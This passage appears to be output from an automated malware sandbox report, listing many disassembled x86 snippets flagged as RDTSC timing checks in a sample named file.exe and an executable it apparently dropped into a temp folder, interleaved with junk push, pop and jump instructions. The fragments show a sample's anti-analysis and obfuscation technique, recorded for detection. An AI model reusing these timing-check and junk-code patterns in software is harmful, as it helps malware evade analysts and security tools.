xor edx, edx 0x00000073 jmp 00007F4D44D05178h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F4D44D0519Dh 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF03FD second address: 4FF0403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0403 second address: 4FF0421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4D44D051A2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0421 second address: 4FF047E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F4DB5AE2D72h 0x0000000f jmp 00007F4D45034D26h 0x00000014 js 00007F4D45034D73h 0x0000001a jmp 00007F4D45034D20h 0x0000001f cmp dword ptr [ebp-14h], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4D45034D27h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF047E second address: 4FF04D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F4DB57B3196h 0x0000000f jmp 00007F4D44D0519Eh 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov di, 1400h 0x0000001e jmp 00007F4D44D051A9h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF04D3 second address: 4FF04D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF04D8 second address: 4FF0507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-2Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 pushfd 0x00000011 jmp 00007F4D44D0519Ch 0x00000016 and cx, 04A8h 0x0000001b jmp 00007F4D44D0519Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0507 second address: 4FF050E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF050E second address: 4FF0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D44D0519Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0525 second address: 4FF054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F4D45034D24h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bl, 2Dh 0x00000017 mov bx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF054F second address: 4FF0561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0561 second address: 4FF059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4D45034D29h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4D45034D1Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF059C second address: 4FF05EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov eax, 5A839DA3h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F4D44D051A4h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F4D44D051A8h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF05EC second address: 4FF0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0607 second address: 4FF060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0627 second address: 4FF062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF062D second address: 4FF0633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0633 second address: 4FF0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0637 second address: 4FF063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF063B second address: 4FF0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F4D45034D1Ch 0x0000000f je 00007F4DB5AE2D1Ah 0x00000015 xor eax, eax 0x00000017 jmp 00007F4D4500E44Ah 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 mov edi, eax 0x00000026 cmp edi, 00000000h 0x00000029 setne al 0x0000002c xor ebx, ebx 0x0000002e test al, 01h 0x00000030 jne 00007F4D45034D17h 0x00000032 jmp 00007F4D45034E09h 0x00000037 call 00007F4D49A3C490h 0x0000003c mov edi, edi 0x0000003e jmp 00007F4D45034D1Bh 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov ebx, esi 0x00000047 mov eax, 6D92A8C7h 0x0000004c popad 0x0000004d push eax 0x0000004e jmp 00007F4D45034D1Dh 0x00000053 xchg eax, ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4D45034D28h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0042 second address: 4FF0048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0048 second address: 4FF004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF004D second address: 4FF0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov ax, 97DDh 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4D44D0519Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0120 second address: 4FF0126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0952 second address: 4FF0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0964 second address: 4FF0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D45034D23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0982 second address: 4FF09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4D44D0519Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09B7 second address: 4FF09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09BC second address: 4FF09C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09C2 second address: 4FF09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09C6 second address: 4FF09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09CA second address: 4FF09EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AF459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4D45034D1Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09EC second address: 4FF09F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09F2 second address: 4FF09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF09F8 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CAF second address: 4FF0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CBE second address: 4FF0CF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4D44D051A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0CF9 second address: 4FF0D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D08 second address: 4FF0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D0E second address: 4FF0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F4DB5AC897Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4D45034D20h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D39 second address: 4FF0D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0D3D second address: 4FF0D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000ABE second address: 5000AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AC2 second address: 5000ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000ADE second address: 5000AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AE6 second address: 5000AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AF4 second address: 5000AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AF8 second address: 5000AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000AFE second address: 5000B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B17 second address: 5000B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B1B second address: 5000B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B1F second address: 5000B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B25 second address: 5000B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4D44D0519Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B4A second address: 5000B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B59 second address: 5000B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B5F second address: 5000B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, 5E1279F3h 0x0000000f mov ecx, 05D0C24Fh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F4D45034D1Eh 0x0000001f and eax, 0D1406F8h 0x00000025 jmp 00007F4D45034D1Bh 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000B99 second address: 5000BED instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F4D44D051A5h 0x0000000d and ecx, 1ED0F396h 0x00000013 jmp 00007F4D44D051A1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F4D44D051A6h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BED second address: 5000BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BF3 second address: 5000C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4D44D0519Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C13 second address: 5000C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C22 second address: 5000C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4DB579290Eh 0x0000000f jmp 00007F4D44D0519Eh 0x00000014 cmp dword ptr [75AF459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C60 second address: 5000C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C66 second address: 5000CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4DB57AA9BFh 0x0000000e jmp 00007F4D44D0519Dh 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4D44D0519Eh 0x00000019 push eax 0x0000001a jmp 00007F4D44D0519Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA3 second address: 5000CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA7 second address: 5000CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CDA second address: 5000CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CF2 second address: 5000D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov ch, C1h 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4D44D0519Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D19 second address: 5000D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D96 second address: 5000D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000D9C second address: 5000DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000DA0 second address: 5000DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov di, 8838h 0x0000000e pushfd 0x0000000f jmp 00007F4D44D051A1h 0x00000014 xor cx, 5826h 0x00000019 jmp 00007F4D44D051A1h 0x0000001e popfd 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4D44D0519Dh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: E4EC28 second address: E4EC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FAEE09 second address: FAEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAC08 second address: FCAC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D45034D1Ah 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE0 second address: FCAFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE4 second address: FCAFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFE8 second address: FCAFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCAFEE second address: FCAFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4D45034D1Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1B4 second address: FCB1E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4D44D0519Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1E0 second address: FCB1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCB1E4 second address: FCB1F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4D44D05196h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCEAB8 second address: FCEB1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 763E01FBh 0x0000000f mov dx, 6D7Fh 0x00000013 push 00000003h 0x00000015 mov edx, dword ptr [ebp+122D2C93h] 0x0000001b jnl 00007F4D45034D19h 0x00000021 push 00000000h 0x00000023 mov ecx, 0E4798FBh 0x00000028 push 00000003h 0x0000002a mov dx, si 0x0000002d push E2270930h 0x00000032 je 00007F4D45034D20h 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jp 00007F4D45034D16h 0x00000041 popad 0x00000042 xor dword ptr [esp], 22270930h 0x00000049 adc cx, F4C0h 0x0000004e lea ebx, dword ptr [ebp+12453931h] 0x00000054 xchg eax, ebx 0x00000055 je 00007F4D45034D39h 0x0000005b push eax 0x0000005c push edx 0x0000005d jnp 00007F4D45034D16h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FCECE7 second address: FCED0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F4D44D05196h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3819h], edi 0x00000015 push 00000000h 0x00000017 mov ecx, 154CCD60h 0x0000001c push ACE6FB2Ch 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FED249 second address: FED250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
